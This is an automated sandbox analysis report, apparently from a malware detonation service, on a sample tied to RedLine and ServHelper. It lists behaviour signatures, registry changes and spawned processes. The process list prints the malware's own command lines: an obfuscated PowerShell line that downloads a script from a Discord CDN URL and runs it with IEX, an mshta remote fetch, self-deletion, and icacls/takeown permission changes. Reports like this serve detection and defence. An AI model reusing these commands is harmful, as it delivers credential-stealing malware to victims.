Analysis Overview
SHA256
f60f32ec899bcb92fd50491a8c32f0548afbd4dc02462dfa373d484b4b161a86
Threat Level: Known bad
The file f618840fdc6d40a683f35a268444ad53 was found to be: Known bad.
Malicious Activity Summary
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
RedLine Payload
suricata: ET MALWARE ServHelper CnC Inital Checkin
RedLine
ServHelper
Grants admin privileges
Sets DLL path for service in the registry
UPX packed file
Downloads MZ/PE file
Possible privilege escalation attempt
Executes dropped EXE
Blocklisted process makes network request
Modifies RDP port number used by Windows
Deletes itself
Modifies file permissions
Loads dropped DLL
Checks computer location settings
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of SetThreadContext
autoit_exe
Drops file in System32 directory
Drops file in Windows directory
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Modifies data under HKEY_USERS
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: MapViewOfSection
Modifies registry key
Suspicious use of SetWindowsHookEx
Suspicious behavior: LoadsDriver
Modifies system certificate store
Suspicious use of FindShellTrayWindow
Runs net.exe
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2021-08-14 06:48
Signatures
autoit_exe
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2021-08-14 06:48
Reported
2021-08-14 06:51
Platform
win7v20210410
Max time kernel
128s
Max time network
161s
Command Line
Signatures
RedLine
RedLine Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
ServHelper
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
Grants admin privileges
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\mshta.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1550642269.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1550642269.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1261989323.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\clr.exe | N/A |
Modifies RDP port number used by Windows
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
Sets DLL path for service in the registry
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1550642269.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\rfxvmt.dll | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1696 set thread context of 732 | N/A | C:\Users\Admin\AppData\Local\Temp\1550642269.exe | C:\Users\Admin\AppData\Local\Temp\1550642269.exe |
| PID 1696 set thread context of 560 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\branding\ShellBrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3f798d1b-489d-4b83-9b14-670c33cb8ef5 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fef9581a-1e37-4a4c-9f80-e951c13921a4 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_99f3e17c-4698-4db9-96ef-7e68af737730 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_34edabfb-a2d6-4b7d-a613-773c073a3b0e | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasvc.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\Basebrd | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_200392e4-b224-4513-aae4-49b6df4e6ea0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9df83c12-38e8-4240-8db6-9197e607e181 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_efb4baf2-1462-4114-b5fa-e63c9eca6af1 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_9b9662a0-387e-409c-99af-c69341e7ccac | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\branding\wupsvc.jpg | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_760afb4c-cf87-46ae-a147-0ee3fcb6d7b7 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_40e286a5-0406-44a8-9f6a-0d129d327baf | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\branding\mediasrv.png | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I1VS2SPHY69JNCZOYJDR.temp | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_650d3c54-d93d-47a5-9daa-9584e06593e0 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000074253d9bc7ab1a4f8b9090448ede0ef9000000000200000000001066000000010000200000007da4992bf9230c93b78bf6b68fb987b2392140f05f421a33b823d4bfeb369082000000000e80000000020000200000002b4735b491d2252ffd33e5d74f971708637ff6a66bafa6bd9d49e63d1c990332200000003b9d3e5eca4b6a235145b5bf9c2a71861edb9a724a00a4b2f1f67c4b36bd6e9a40000000be6602838ce0ee33bdc7782941504684305f927a2ee6d72925e58ed3c3781ffb4a1ae8c811d832001470e994e6057990bdf8ad347c28973a677409d986ea153c | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000074253d9bc7ab1a4f8b9090448ede0ef9000000000200000000001066000000010000200000006008c4c0103dd3596c272ae1b4ec0b74c352fa2392c03507774be3dfdd013e46000000000e800000000200002000000084bfb517e4b36a3c8516d4ee3028f1b303c11a22524266af20a0c0f298b7684590000000123b61482f16c02476186c120a88e1a8eef077c800c3b802e2dd7f7b8733399d1728c1488893c430c8163acac67e552e21e8d1bad47d43c8db6fb59f9799a5846202857602489c0aa4f4dab14c5540b47c9489752a1e6648d5ee2d5fd1667910a69b8372722bcc16abbc3548db01952ec8579f17b65c18920809173b116b005197be55c81ea59fdc8adfe2d0236fd5824000000007151986025e84459449f17a885c0682f222d2d17a2d93baa08605ba1df8701ec9eff98b3fadf6e287252060f15e66d1de7bfbe019e73bc3ef093f4a9610e52b | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{38151021-FCCC-11EB-BE93-726C7BD0CD11} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\System32\mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 902ac60ed990d701 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "335688935" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 882dd222d990d701 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe
"C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe"
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
C:\Users\Admin\AppData\Local\Temp\1550642269.exe
C:\Users\Admin\AppData\Local\Temp\1261989323.exe
C:\Users\Admin\AppData\Local\Temp\1261989323.exe
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://cdn.discordapp.com/attachments/875766613159333928/875767110058532884/geometre.txt
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://www.binance.com/en/register?ref=WDA8929C
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\f618840fdc6d40a683f35a268444ad53.exe & exit
C:\Windows\SysWOW64\PING.EXE
ping 0
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1688 CREDAT:275457 /prefetch:2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://cdn.discordapp.com/attachments/875766613159333928/875766957905969182/matematecle.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
C:\Users\Admin\AppData\Local\Temp\clr.exe
"C:\Users\Admin\AppData\Local\Temp\clr.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\li0ngda1\li0ngda1.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9656.tmp" "c:\Users\Admin\AppData\Local\Temp\li0ngda1\CSC68A5B573BB724897BDD73A04FCEFF5F.TMP"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 4.0 -s -NoLogo -NoProfile
C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
